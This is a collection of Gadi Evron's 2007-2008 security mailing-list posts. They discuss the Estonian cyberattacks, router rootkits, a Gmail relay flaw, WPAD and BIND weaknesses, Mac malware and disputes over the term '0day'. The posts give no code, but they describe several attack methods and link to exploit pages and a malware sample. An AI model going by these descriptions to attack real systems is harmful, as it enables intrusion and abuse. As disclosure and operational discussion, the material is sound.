[Gadi Evron]

About a year ago after coming back from Estonia I promised I'd send in an 
account of the Estonian "war". The postmortem analysis and recommendations 
I later wrote for the Estonian CERT are not yet public.


A few months ago I wrote an article for the Georgetown Journal of 
International Affairs, covering the story of what happened there, in 
depth. The journal owns the copyright so I had no way of sending that 
along either. I wasn't about to email saying "go buy a copy".


Mostly silly articles kept popping up with misguided to wrong information 
about what happened in Estonia, and when an Estonian student was arrested 
for participating, some in our community even jumped up to say "it was 
just some student". Ridiculous.


This is the "war" that made politicians aware of cyber security and entire 
countries scared, NATO to "respond" and the US to send in "help". 
It deserved a better understanding for that alone, whatever actually 
happened there.


I was there to help, but I just deliver the account. The heroes of the 
story are the Estonian ISP and banking security professionals and the 
CERT (Hillar Aarelaid and Aivar Jaakson).


Apparently the Journal made my article available in PDF form by a third 
party:


Battling Botnets and Online Mobs
Estonia's Defense Efforts during the Internet War

URL: http://www.ciaonet.org/journals/gjia/v9i1/699.pdf

It is not technical, I hope you find it useful.

Gadi Evron.

IOS rootkits

[Gadi Evron]

At the upcoming EusecWest Sebastian Muniz will apparently unveil an IOS 
rootkit. skip below for the news item itself.


We've had discussions on this before, here and elsewhere. I've been heavily 
attacked on the subject of considering router security as an issue when 
compared to routing security.


I have a lot to say about this, looking into this threat for a few years now 
and having engaged different organizations within Cisco on the subject in the 
past.  Due to what I refer to as an "NDA of honour" I will just relay the 
following until it is "officially" public, then consider what should be made 
public, including:


1. Current defense startegies possible with Cisco gear
2. Third party defense strategies (yes, they now exist)
2. Cisco response (no names or exact quotes will likely be given)
3. A bet on when such a rootkit would be public, and who won it (participants 
are.. "relevant people").


From:
http://www.networkworld.com/news/2008/051408-hacker-writes-rootkit-for-ciscos.html

"A security researcher has developed malicious rootkit software for Cisco's 
routers, a development that has placed increasing scrutiny on the routers that 
carry the majority of the Internet's traffic.


Sebastian Muniz, a researcher with Core Security Technologies, developed the 
software, which he will unveil on May 22 at the EuSecWest conference in London. "


Gadi Evron.

Re: Exploiting Google MX servers as Open SMTP Relays

[Gadi Evron]

On Wed, 7 May 2008 [EMAIL PROTECTED] wrote:


Vulnerability Report:

As part of our recent work on the trust hierarchy that exists among email 
providers throughout the Internet, we have uncovered a serious security flaw in 
Ggoogle's free email service, Gmail. This vulnerability exposes Google's email 
servers in a way that allows an attacker to use them as open spam and phishing 
relays. This issue is related to the risk of a malicious user abusing Gmail's 
email forwarding functionality. This is possible because Gmail's email 
forwarding functionality does not impose proper security restrictions during 
its setup process and can be easily subverted. By exploiting this problem an 
attacker can send unlimited spam and phishing (i.e. forged) email messages that 
are delivered by Google's very own SMTP servers. Since the messages are 
delivered by Google's own servers, an attack based on this flaw is able to 
bypass all spam filters that are based on the blacklist / whitelist concept. We 
were able to confirm that this vulnerability is indeed exploitable b
y crafting a proof of concept attack that allowed us to send any number of 
forged email messages without restriction through Google's server 
infrastructure. We have also verified that this flaw allows attackers to bypass 
spam filters by using our method to send messages that are usually flagged as 
spam. While sending these messages directly from our network in the traditional 
way had the messages classified as spam, by sending the very same messages 
using our exploit, the messages were delivered directly to the victim's inbox, 
thus bypassing filters.

Impact:

All email providers that offer Google's SMTP servers any special level of trust 
(e.g. whitelist status) are vulnerable.


A lot of spam is currently being sent that way.

Gadi.



Disclosure:
We have contacted Google about this issue and are waiting for their position 
before releasing further details.

For more information, visit our homepage:
http://ece.uprm.edu/~andre/insert


Regards,


Pablo Ximenes, André dos Santos

INSERT - Information Security Research Team
University of PR at Mayaguez (UPRM), USA
State University of Ceará (UECE), Brazil

[EMAIL PROTECTED], [EMAIL PROTECTED]

hacking a pacemaker

[Gadi Evron]

Almost a year ago I gave a talk at the CCC Camp in Germany I called "hacking 
the bionic man". It even made Wired, in some fashion.

http://blog.wired.com/27bstroke6/2007/08/will-the-bionic.html
http://events.ccc.de/camp/2007/Fahrplan/events/2049.en.html

In the talk, among other things such as the DNA and scripting languages, 
medical doctors and reverse engineers...  was about cybernetic hacking.
I gave some predictions, some for 2 years, others 40 years. Some again were 
pure science fiction. I was wrong on the 2 years, it's here.


Today, this came up in the news (hat tip to Paul Ferguson on the funsec mailing 
list):

http://www.nytimes.com/2008/03/12/business/12heart-web.html?_r=1&oref=slogin

" The threat seems largely theoretical. But a team of computer security 
researchers plans to report Wednesday that it had been able to gain wireless 
access to a combination heart defibrillator and pacemaker.


They were able to reprogram it to shut down and to deliver jolts of electricity 
that would potentially be fatal . if the device had been in a person. In this 
case, the researcher were hacking into a device in a laboratory. "


Gadi Evron.

Re: [Full-disclosure] what is this?

[Gadi Evron]

On Tue, 15 Jan 2008, crazy frog crazy frog wrote:

nick,
ur not getting my point,the url is techicorner.com/{random string
here},i have already mentioned it in previous posts.
i have read the link sent by denis,and i would have to conclude that:
1)The problem does not occurs always,instead it occurs randomly based
on IP or something like tht.


In recent kits, it is more likely it is user-agent based.


2)if u look at the pages on techicorner.com u will not find any
malicious code,so its possible that the server is compromised and its
an LKM
please refer to these links:
http://www.webhostingtalk.com/showthread.php?t=651748 [thanks denis]

Thanks again everyone for your valuable suggestion,i posted here to
share this stuff with everyone and may be u can learn from it.

regards,
_CF

On Jan 15, 2008 12:15 PM, Nick FitzGerald <[EMAIL PROTECTED]> wrote:

crazy frog crazy frog wrote:


well,
i received many response but no one is perfact.i checked the files and
didn't find anything embeded in my scripts or pages.still i have to
figure out why my antivirus randomly popsup?i mean most of the times
it doesnt detect any infection but then suddenly this thing happnes
and then everything seems ok.
i dont think its a problem with my script otherwise i could have find
the code or it should be repeating consistly.has any one still facing
this issue in the techicorner.com or on tubeley.com or on
secgeeks.com?

let me know i m trying hard to digg this issue.


If you would tell us the _actual_ URL where this behaviour is being
seen we would have a reasonable chance of actually diagnosing it.  As
it is, we're having to guess based on matching your half-arsed
descriptions of what you think is happening with our knowledge of what
has been seen going on out there.

This may surprise you, but many thousands and thousands of sites are
compromised each day to display "similar" activity to what you've asked
to us to diagnose (aka "guess").

If we could look at the actual site and see what is really happening
should have a better (if not perfect) chance of success.


Regards,

Nick FitzGerald


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
advertise on secgeeks?
http://secgeeks.com/Advertising_on_Secgeeks.com
http://newskicks.com

Re: what is this?

[Gadi Evron]

Hi,

Recently on opening one of my site,my antivirus pops up saying that it
has found on malicious script.the url is random and i have managed to
get tht script.it is using some flaw in apple quick time.
u can get the zip file for java script here:
http://secgeeks.com/what.zip
password is 12345
can somebody guide/help me what is this and how can i remove it?


I did not look at the malware, but it is pretty obvious you have been 
compromised.


Defacements today (unless for specific reason of being "seen") are about 
leaving the site the same way you find it, and infecteing its user 
base/visitors.


A second option is that you are secure but a "partner" such as ad sites 
has been compromised and infects your users.


Naturally, a compromise can come from anywhere, but in most cases it is 
something like RFI... Taosecurity linked to three great papers on the 
subject of web botnets / cross-platform web malware:

http://taosecurity.blogspot.com/2007/11/great-papers-from-honeynet-project.html

Linking also to my original article here:
http://blogs.securiteam.com/index.php/archives/815

Gadi.

Re: [dns-operations] Web Proxy Auto-Discovery (WPAD) Information Disclosure (fwd)

[Gadi Evron]

-- Forwarded message --
Date: Tue, 4 Dec 2007 00:56:51 -0600 (CST)
From: Gadi Evron <[EMAIL PROTECTED]>
To: Rickard Dahlstrand <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: [dns-operations] Web Proxy Auto-Discovery (WPAD) Information
Disclosure

On Tue, 4 Dec 2007, Rickard Dahlstrand wrote:

Gadi Evron wrote:

http://www.microsoft.com/technet/security/advisory/945713.mspx

A malicious user could host a WPAD server, potentially establishing it as
a proxy server to conduct man-in-the-middle attacks against customers
whose domains are registered as a subdomain to a second-level domain
(SLD). For customers with a primary DNS suffix configured, the DNS
resolver in Windows will attempt to resolve an unqualified .wpad. hostname
using each sub-domain in the DNS suffix until a second-level domain is
reached. For example, if the DNS suffix is corp.contoso.co.us and an
attempt is made to resolve an unqualified hostname of wpad, the DNS
resolver will try wpad.corp.contoso.co.us. If that is not found, it will
try, via DNS devolution, to resolve wpad.contoso.co.us. If that is not
found, it will try to resolve wpad.co.us, which is outside of the
contoso.co.us domain.


Most of the wpad.tld domains are already reserved like this one
http://wpad.com/ It's amazing that when they fixed it for .com etc. a
while back they missed that there where two-level tld-domains.

Rickard.



http://www.microsoft.com/technet/security/bulletin/fq99-054.mspx
-
What's the problem with the search algorithm?
When IE 5 starts, it will begin searching for a WPAD server, if it is 
configured to use WPAD. It starts the search by adding the hostname "WPAD" to 
current fully-qualified domain name. For instance, a client in 
a.b.Microsoft.com would search for a WPAD server at wpad.a.b.microsoft.com. If 
it could not locate one, it would remove the bottom-most domain and try again; 
for instance, it would try wpad.b.microsoft.com next. IE 5 would stop searching 
when it found a WPAD server or reached the third-level domain, 
wpad.microsoft.com.
The algorithm stops at the third level in order to not search outside of the 
current network. However, for international sites, this is not sufficient, 
because third-level domains can be outside the current network. For example, if 
the network at xyz.com.au did not have a WPAD server, the search algorithm 
eventually would reach wpad.com.au, which is an external network name. If the 
owner of wpad.com.au set up a WPAD server, he or she could provide chosen proxy 
server configuration settings to the clients at xyz.com.au. For that matter, 
any network in com.au that didn't have its own WPAD server but did have WPAD 
enabled in its web clients also would also resolve to wpad.com.au.

-

From the FAQ for the 1999 fix...


It is quite possible, and we can assume (until someone tells us they know), 
that they fixed it for ccTLDs as well, and then re-introduced the flaw somehow.


Also:
http://www.wlug.org.nz/WPAD
-
(BeauButler?: I have registered wpad.co.nz, and do not intend to be 'really 
nasty'. I am collecting the 404 logs with the intention to produce some nice 
charts, hoever. Also, the wpad organisational-boundaries bug appears to have 
resurfaced in Internet Explorer 7!!)

-
Beau Bulter is the guy who got all the press by talking about this at kiwicon 
last week:

https://kiwicon.org/presentations#oddy

This is the story that got Microsoft's attention:
http://www.theage.com.au/news/technology/flaw-leaves-microsoft-looking-like-a-turkey/2007/11/23/1195975914416.html
Which is where Beau says there are ~160,000 exploitable machines in NZ alone. 
He would *supposedly* know since he has the wpad.co.nz domain.


Whether it is a major issue or not, misconfigurations happens, heck, shit 
happens. I'd think we should watch for this and get that domain 
registered/monitored at different ccTLDs.


Gadi.

Re: [Full-disclosure] Warning: Hackers hijacking unused IP Addresses inside Trusted domains [POC]

[Gadi Evron]

On Wed, 21 Nov 2007, Paul Schmehl wrote:
If Yahoo was able to fix the problem quickly, then it would appear that Yahoo 
had a compromised domain server or servers.


We all get pwned at one point or another, how we respond is what matters.




--
Paul Schmehl ([EMAIL PROTECTED])
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/

RE: mac trojan in-the-wild

[Gadi Evron]

On Thu, 1 Nov 2007, Jim Harrison wrote:

While Apple-oriented threats may not get either the validation or the publicity 
(on hardly equals the other) that Windows attacks do, it's hardly accurate 
(much less fair) to make those comparisons.
For all those comparative points, my Kaypro-4 running ZCPR is more secure than 
any Apple OS.



The comparison is of the Microsoft eco-system in the security realm when 
Windows 98 was out. Whether by lack of visibility, unpatched exploits or 
organized criminal interest.


That is the significant part.

Gadi.

the heart of the problem [was: RE: mac trojan in-the-wild]

[Gadi Evron]

On Thu, 1 Nov 2007, Thor (Hammer of God) wrote:

But more importantly, let's look at things from the other side.  Let's
say I'm wrong, and that Gadi is right on target with his "hit hard"


I'd say we are both right.
You look at it from a security researcher stand-point. There is nothing 
interesting about user-interaction, and it is even kind of lame.


From a reasonable perspective, we refuse to believe people will act so .. 

silly.


prediction and that we should be very concerned with this.  Given the


Not predicting, assessing.

Criminal elements have a very clear cost/benefit calculation. For example, 
they won't release a 0day such as WMF or ANI as long as their revenue 
goals are met with published ones. They collect statistics on OS, browser, 
language, which exploit got how many, etc.


They have thousands on thousands of sites infecting users who surf (some 
of them ad-based on real sites, or defaced sites such as forums that 
remain with the same content only now infect people). Then there is also 
spam directing people to these sites.


Now, a criminal gang (could be the mob could be one guy) targets the mac. 
So much so that they serve different malware by OS-type.


As a security researcher looking at code, bits and bytes, you are simply 
not usually following what's going on in operational security where things 
are bleak.


From an operational security standpoint, this equates to what happened in 
the world of the Internet back when Windows 98 was around. Not what 
security features it had.



requirements here, that again being flagrant ignorance where all the
above steps are executed (including the explicit admin part)-- what
exactly are we supposed to do?  If people are willing and able to go
through the motions above what can we as security people do to prevent
it?  Far too many people in this industry are far too quick to point out
how desperate the situation is at all turns, but I don't see many people
offering real solutions.  But you know, I have to say...  If we are


Things are in fact FUBAR. We need new ideas and new solutions as honestly, 
although we want to feel we make a difference by taking care of this or 
that malware or this and that C&C we are powerless and have not made a 
real difference in the past 6 years while things got worse.


We need new solutions and new ideas, and would be more than happy to have 
new people exploring operational security.


The current state of Internet security is you get slapped -- BAM! -- and 
you write an analysis about it. (when speaking at ISOI I actually slapped 
myself -- HARD -- when I said it on stage, not a good idea for future 
reference).



really going to consider this "serious," and we are really going to
define part of our jobs as being responsible for stopping people who
have absolutely no concerns for what they do and are willing to enter
their admin credentials into any box that asks for it, then I'd say that
there is a *serious* misunderstanding about what security is, and what
can be done about it-- either that, or I'm just in the wrong business.

t


Well, we can't choose the risks. They choose us. Sometimes they are cool, 
sometimes they're not.


I often start emails by saying "first off, this is not the end of the 
world, the Sun will rise tomorrow and the Internet won't die today". I 
tire of it. Of course the Internet won't die today, but it is Mac season.


Apple is very much correct by not investing in security first until now -- 
from a BUSINESS standpoint, however much we as security people in our 
niche can't get behind it. Things are different now and unfortunately they 
have a backlog to deal with.


Gadi.

Re: [botnets] re MAC trojan (fwd)

[Gadi Evron]

There have been many threads on this subject, but I believe this post 
below covers what some of us are trying to say on why this issue is 
significant.


Obviously some people are far more articulate than me.


-- Forwarded message --
Date: Thu, 1 Nov 2007 16:47:17 -0400
From: PinkFreud <[EMAIL PROTECTED]>
To: Gary Flynn <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: [botnets] re MAC trojan

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--
[My apologies if this has already been covered - I started this email a
few hours ago, and haven't had a chance to finish it until now.]


I think the point Gadi (and Alex of Sunbelt Software, in his original
blog entry) is trying to make is that professional malware authors have
begun to take notice of Apple.  As a piece of malware goes, this trojan
is nothing remarkable in itself, other than the fact that it's aimed at
Mac users.

As Gadi mentioned, there are a number of known issues that Apple has
yet to address.  If the professional malware authors are now taking aim
at Mac users, Apple appears to be making it easy for them.

There are a few comments that I've seen in this thread that are rather
worrisome:

::: Interspace System Department

Relax. MAC users are not that stupid as MS users...


Are you a Mac user?  If so, you just proved yourself wrong with that
statement.  :)

Users are users, and their knowledge of computers varies greatly from
one to the next.  I've supported a number of Mac users who tend to be
clueless when it comes to computers, and I've supported Mac users who
know quite a bit about the machines they use.  Like any Windows or *nix
user, Mac users can - and will - fall prey to this kind of scheme.

Again, the trojan is not what's important here.  The fact that it was
written for Macs is particularly noteworthy, however.


::: Jeremy Chatfield

InfoSec is there to make sure that I can run my business, not as an end in
itself. It *prevents* profit making activity by having effort expended on
internal needs. So if the Mac hasn't *needed* higher level of security
hoops, previously, that's good. So long as weaknesses are fixed *when
needed*, I'm a happy bunny. If there's a Day Zero attack that hits a Mac,
I'll be disappointed, but it's not a uniquely Mac situation to be in... If
the failure was an obvious weakness, I'm actually still pretty sanguine,
because it hasn't yet been exploited, despite being "well known".


Security issues should be fixed as soon as feasable, not 'when needed'.
If all security vulnerabilities were fixed 'when needed', the malware
authors would be having a field day (which, of course, implies they're
not already... h.).

Apple has a history of badly-written software.  As far as recent
examples go, take a look at tar and rsync on Tiger (10.4) - they've
been modified to support extended attributes like ACLs and resource
forks, and they're quite broken - extended attribute support introduces
a serious memory leak.

If that doesn't quite hit home, you can get a further idea of how their
software is written by taking a look at the man page for sharing(1), on
OS X Server (for those of you without access to OS X Server, take a
look at
http://developer.apple.com/DOCUMENTATION/Darwin/Reference/ManPages/man1/sharing.1.html
).  Pay particular attention to the description for the -s, -g, and -i
options - do their developers (or tech writers) know the difference
between AND and OR?  :)



On Thu, Nov 01, 2007 at 08:56:22AM -0400, Gary Flynn babbled thus:

This is nothing more than simple downloadable malware exacerbated
somewhat by permissive configuration settings. It exploits no
security defects.

As I understand it, the operator is given multiple opportunities
to refuse the program:

http://www.jmu.edu/computing/security/#macmalware

(I'm only subscribed to the archive so I apologize if this
  has been already pointed out or already proven incorrect
  today)

--
Gary Flynn
Security Engineer
James Madison University
www.jmu.edu/computing/security


--
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

mac trojan in-the-wild

[Gadi Evron]

For whoever didn't hear, there is a Macintosh trojan in-the-wild being 
dropped, infecting mac users.
Yes, it is being done by a regular online gang--itw--it is not yet another 
proof of concept. The same gang infects Windows machines as well, just 
that now they also target macs.


http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html
http://sunbeltblog.blogspot.com/2007/10/mackanapes-can-now-can-feel-pain-of.html

This means one thing: Apple's day has finally come and Apple users are 
going to get hit hard. All those unpatched vulnerabilities from years past 
are going to bite them in the behind.


I can sum it up in one sentence: OS X is the new Windows 98. Investing in
security ONLY as a last resort losses money, but everyone has to learn it 
for themselves.


Gadi Evron.

Re: defining 0day

[Gadi Evron]

On Wed, 26 Sep 2007, Charles Miller wrote:

On 26/09/2007, at 5:02 AM, Gadi Evron wrote:

Okay. I think we exhausted the different views, and maybe we are now able 
to come to a conlusion on what we WANT 0day to mean.


What do you, as professional, believe 0day should mean, regardless of 
previous definitions?


As a professional, I would be happy to see terms like '0day' banished from 
the lexicon entirely. It's an essentially meaningless -- all third-party 
exploits are zero-day to _somebody_ -- term of boast co-opted from the warez 
scene, and we can do perfectly well without it.


Quibbling over its precise definition seems a ridiculous waste of bytes.



It would if we are to stay stuck in our niche, but you need to remember - 
security is about niches, we are all experts -- but in very specific 
fields.


These past 2 years we faced multiple targeted attacks with previously 
unknown vulnerabilities. We experience MASSIVE exploitation of users with 
0days used on web sites and ine mail, etc.


As an industry, as professionals, it is time to get our act together on 
the basics.


I am operations manager for ZERT, and for me, this is indeed at the very 
heart of the matter. How you define this silliness is directly linked to 
how you do two of the most essential parts of security:


1. Vulnerability disclosure - for researchers.

2. Incident response - for.. responders.

If a vulnerabiliy is fully disclosed, unpatched, being actively exploited, 
etc. caused real confusion, and non of us, or any of the written material, 
can agree on the basics.


It's not about fighting on what 0day means as much as it is about how we 
as an industry, a community, conduct ourselves and can reach a common 
language, which directly impacts operations.


So, if WMF was disclosed today after being actively exploited itw for a 
while, what would you call it? How would you respond to it? How long would 
it stay unpatched and when will you realize its importance?



C


Gadi.

Re: defining 0day

[Gadi Evron]

On Tue, 25 Sep 2007, Brian Loe wrote:

On 9/25/07, Gadi Evron <[EMAIL PROTECTED]> wrote:


Okay. I think we exhausted the different views, and maybe we are now able
to come to a conlusion on what we WANT 0day to mean.

What do you, as professional, believe 0day should mean, regardless of
previous definitions?



Seems to me that definitions, and language itself, is a product of
evolution. You can't just remove all previous meanings. Its better
anyway to stick to the most accepted, acknowledged and DOCUMENTED
definitions:


No longer good enough.

We can get a press scare over a public vuln release, or a wake-up call.

I think we can do better as an industry.

defining 0day

[Gadi Evron]

On Tue, 25 Sep 2007, Thor (Hammer of God) wrote:

For the record, the original term "O-Day" was coined by a dyslexic
security engineer who listened to too much Harry Belafonte while working
all night on a drink of rum.  It's true.  Really.

t


Okay. I think we exhausted the different views, and maybe we are now able 
to come to a conlusion on what we WANT 0day to mean.


What do you, as professional, believe 0day should mean, regardless of 
previous definitions?


Obviously, the term has become charged in the past couple of years with 
the targeted office vulnerabilities attacks, WMF, ANI, etc.


We require a term to address these, just as much as we do "unpatched 
vulnerability" or "fully disclosed vulnerability".


What other such descriptions should we consider before proceeding? 
non-disclosure?


Gadi.

Re: [Full-disclosure] 0day: PDF pwns Windows

[Gadi Evron]

On Thu, 20 Sep 2007, Joey Mengele wrote:

Dear Fatboy,

Let's put aside for a minute the fact that you have no idea what


You like people on the heavy side? Psst... call me.



you are talking about and let's also, for the benefit of this very
valuable debate, assume your definition is correct. First, please
prove this bug was never used in the wild. After that, please prove
your credibility in the realm of defining words related to illegal
computer hacking. Thanks.

J

P.S. Talking about botnets doesn't count to satisfy part 1 OR part 2

___
"If today I stand here as a revolutionary, it is as a revolutionary
against the Revolution."


On Thu, 20 Sep 2007 11:29:22 -0400 Gadi Evron <[EMAIL PROTECTED]>
wrote:

Impressive vulnerability, new. Not a 0day.

Not to start an argument again, but fact is, people stop calling
everything a 0day unless it is, say WMF, ANI, etc. exploited in
the wild
without being known.

I don't like the mis-use of this buzzword.

Gadi.


On Thu, 20 Sep 2007, pdp (architect) wrote:


http://www.gnucitizen.org/blog/0day-pdf-pwns-windows

I am closing the season with the following HIGH Risk

vulnerability:

Adobe Acrobat/Reader PDF documents can be used to compromise

your

Windows box. Completely!!! Invisibly and unwillingly!!! All it

takes

is to open a PDF document or stumble across a page which embeds

one.


The issue is quite critical given the fact that PDF documents

are in

the core of today's modern business. This and the fact that it

may

take a while for Adobe to fix their closed source product, are

the

reasons why I am not going to publish any POCs. You have to take

my

word for it. The POCs will be released when an update is

available.


Adobe's representatives can contact me from the usual place. My

advise

for you is not to open any PDF files (locally or remotely).

Other PDF

viewers might be vulnerable too. The issues was verified on

Windows XP

SP2 with the latest Adobe Reader 8.1, although previous versions

and

other setups are also affected.

A formal summary and conclusion of the GNUCITIZEN bug hunt to be

expected soon.


cheers

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
Click now for accounting software that's a huge plus!
http://tagline.hushmail.com/fc/Ioyw6h4eooFnoPRHh77yKi8qPMTyf03wCE9icEun2cA0zQJXBBid3w/

Re: 0day: PDF pwns Windows

[Gadi Evron]

Impressive vulnerability, new. Not a 0day.

Not to start an argument again, but fact is, people stop calling 
everything a 0day unless it is, say WMF, ANI, etc. exploited in the wild 
without being known.


I don't like the mis-use of this buzzword.

Gadi.


On Thu, 20 Sep 2007, pdp (architect) wrote:


http://www.gnucitizen.org/blog/0day-pdf-pwns-windows

I am closing the season with the following HIGH Risk vulnerability:
Adobe Acrobat/Reader PDF documents can be used to compromise your
Windows box. Completely!!! Invisibly and unwillingly!!! All it takes
is to open a PDF document or stumble across a page which embeds one.

The issue is quite critical given the fact that PDF documents are in
the core of today's modern business. This and the fact that it may
take a while for Adobe to fix their closed source product, are the
reasons why I am not going to publish any POCs. You have to take my
word for it. The POCs will be released when an update is available.

Adobe's representatives can contact me from the usual place. My advise
for you is not to open any PDF files (locally or remotely). Other PDF
viewers might be vulnerable too. The issues was verified on Windows XP
SP2 with the latest Adobe Reader 8.1, although previous versions and
other setups are also affected.

A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon.

cheers

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

Community input/questions for ISOI 3?

[Gadi Evron]

Hi, like last time, we are looking for community input and questions for the 
Internet security operations community, to be discussed during ISOI 3.


ISOI is happening this Monday and Tuesday, we will likely compile the responses 
in a few weeks.


We will reply to people personally on issues which bother them, and compile a 
short text with answers to the community itself.


We tried to do this last time around, and encountered a problem with 
classifying which material the presenters allow for public consumtion, and 
which is to remain private due to obvious concerns.


This time around we ask them ahead of time.

The current topics being discussed at ISOI 3 can be located on the schedule:
http://isotf.org/isoi3.html

We may be off though, so feel free to ask on any issue which you find to be
relevant.

Thanks, we appreciate the community's participation.

Gadi.

Re: Exploit In Internet Explorer

[Gadi Evron]

On Tue, 31 Jul 2007, Nick FitzGerald wrote:

[EMAIL PROTECTED] wrote:


Discovred By : Hasadya Raed


"Discovred" as in "found in a web page with some dodgy script in it"?
This exploit (though not in this precise form) is common as muck in
them thar int-duh-net tubes at the moment...

You can't mean "discovered" as in "first found through unique personal
research/investigation/etc" as this exploit has been publicly disclosed
since April 2006, I think (and privately used previously?):


I believe RaeD meant no offense and did was in fact not aware of the 
previous findings. In the past SecuriTeam helped him out with 
disclosure and his findings were on the moeny.


I think:
1. This is either yet another exploit.
2. An honest mistake.

But I am not RaeD not affiliated with him. Give people the benefit of the 
doubt. Who would steal thi sbluntly only to be found out?


Thanks.



  http://www.milw0rm.com/exploits/2052

and again, in a more elaborate "multiple dodgy ActiveX control target"
version shortly thereafter:

  http://www.milw0rm.com/exploits/2164


Now You Can To Download Exe Files And To Run Without Msgs :


Oh, and did I mention patched since 11 April 2006:

  http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx

So probably not that effective if what you want is an assured "fire an
forget" remote IE exploit...


Regards,

Nick FitzGerald

Re: "BIND 9 DNS Cache Poisoning" by Amit Klein (Trusteer)

[Gadi Evron]

This is Paul Vixie's response on this, when I asked him for verification:

-
this bug has been reported over and over again for a dozen years.  it's
odd to have to keep fixing it-- i fixed it in bind4 and bind8 when theo
de raadt offered me his random number generator to use.  bind9 should've
used that same one but apparently didn't.  note that with this fix, the
difficulty in poisoning someone's cache rises from "a few tens of seconds"
to "a few minutes".  it's a 16-bit field.  not a lot of room for
randomness or unpredictability.  only DNSSEC, a protocol change, fixes
this problem, which is fundamentally a protocol problem.  but since folks
just won't leave it alone and keep on reporting it year after decade, we
will keep on improving our random number generator for this dinky little
16-bit field.  i just wish the reporters wouldn't be so smarmy and self
congradulatory about it.  it's not like this hasn't been reported, and
fixed, many times by many others.
-

Gadi.

Re: Internet Explorer 0day exploit

[Gadi Evron]

On Sat, 14 Jul 2007, Dragos Ruiu wrote:

On Tuesday 10 July 2007 08:53, Gadi Evron wrote:

To paraphrase Guninski, this is still not a 0day. It is a vulnerability
being disclosed.


You're being pedantic Gadi. :-)

We have to accept the term "0day" has passed into
the realm of meaningless nebulousness along with
"hacker" and other misused terms.

If we are to be pedantic, the original meaning of
0day is new warez release :-).


I think there is still hope for us buddy, at least when professionals make 
releases.
For example, instead of saying I'm being pedantic on this (which I am), 
you could (also, in addition) reply and say "yep" or "nope", thus 
contributing to some discussion. Meaning, we would either make a stand for 
our profession or at the very least get educated as we go along.


Some people believe the way to reach a "mature industry" is time, others 
believe it's training or in a more specific fashion, certifications. I 
don't know what the answer is, and I am sure it isn't terminology (or 
certifications, hehe).


I do know though, what a 0day is, and don't intend to compromise it for 
the sake of what the press makes of it. It's a strong term and concept 
which shouldn't be abused. That or we can decide on a new term for what 
0day used to mean. How about "blubla"?


From professionals, we can expect good language and for their work to 
speak for them. We shouldn't compromise on silly things like what 0day 
means.


Maybe I will give this up next year, but for now, advisories named "0day" 
have disapeared lately. Maybe peer pressure does have some effect.


The above is over-thinking and some could consider it very silly, but for 
now, I believe in it. It's just like I resent those among consultants who 
conduct themselves in a fashion that makes me ashamed of my profession, as 
a far-off analogy.



cheers,
--dr

--
World Security Pros. Cutting Edge Training, Tools, and Techniques
Tokyo, Japan   November 29/30 - 2007http://pacsec.jp
pgpkey http://dragos.com/ kyxpgp

Re: Internet Explorer 0day exploit

[Gadi Evron]

On Tue, 10 Jul 2007, Thor Larholm wrote:

There is a URL protocol handler command injection vulnerability in Internet


Thor, thank you for sharing. Nice work.

To paraphrase Guninski, this is still not a 0day. It is a vulnerability 
being disclosed.



Explorer for Windows that allows you to execute shell commands with arbitrary 
arguments. This vulnerability can be triggered without user interaction 
simply by visiting a webpage.


When Internet Explorer encounters a reference to content inside a registered 
URL protocol handler scheme it calls ShellExecute with the EXE image path and 
passes the entire request URI without any input validation. For the sake of 
demonstration I have constructed an exploit that bounces through Firefox via 
the FirefoxURL protocol handler. The full advisory and a working Proof of 
Concept exploit can be found at


http://larholm.com/2007/07/10/internet-explorer-0day-exploit/

Cheers
Thor Larholm

CFP: ISOI III (a DA workshop)

[Gadi Evron]

CFP: ISOI III (a DA workshop)
=


Introduction


CFP information and current speakers below.

ISOI 3 (Internet Security Operations and Intelligence) will be held in
Washington DC this August the 27th, 28th.

This time around the folks at US-CERT (Department of Homeland Security -
DHS) are hosting. Sunbelt Software is running the after-party dinner.

We only have a partial agenda at this time (see below), but to remind
you of what you will see, here are the previous ones:
http://isotf.org/isoi2.html
http://isotf.org/isoi.html

If you haven't RSVP'd yet, please do so soon. Although we have 240
seats, we are running out of space.

A web page for ISOI 3 can be found at: http://isotf.org/isoi3.html


Details
---
27th, 28th August, 2007
Washington DC -
AED conference center:
http://www.aedconferencecenter.org/main/html/main.html

Registration via [EMAIL PROTECTED] is mandatory, no cost attached to
attending. Check if you apply for a seat in our web page.


CFP
---

This is the official CFP for ISOI 3. Main subjects include: fastflux,
fraud, DDoS, botnets. Other subjects relating to Internet security
operations are also welcome.

Some of our current speakers as you can see below lecture on anything
from Estonia's "war" to current web 2.0 threats in-the-wild.

Please email [EMAIL PROTECTED] as soon as possible to submit a proposal.
I will gather them and give them to our committee (Jeff Moss) for
review.


Current speakers (before committee decision)


Roger Thompson (Exp Labs
- Google adwords .. .the dangers of dealing with the Russian mafia

Barry Raveendran Greene (Cisco)
- What you should be asking me as a routing vendor

John LaCour (Mark Monitor)
- Vulnerabilities used to hack sites for phishing
- Using XSS to track phishers

Dan Hubbard (Websense)
- Mpack and Honeyjax (Web 2.0 honeypots)

April Lorenzen
- Fastflux: Operational Update

William Salusky (AOL)
- The Spammer Evolves - Migration to WebMail

Hillar Aarelaid (Estonian CERT)
- Incident Response during the Recent Attack

Gadi Evron (Beyond Security)
- Strategic Lessons from the Estonian "First Internet War"

Jose Nazarijo (Arbor)
- Botnet statistics from the Estonian attack

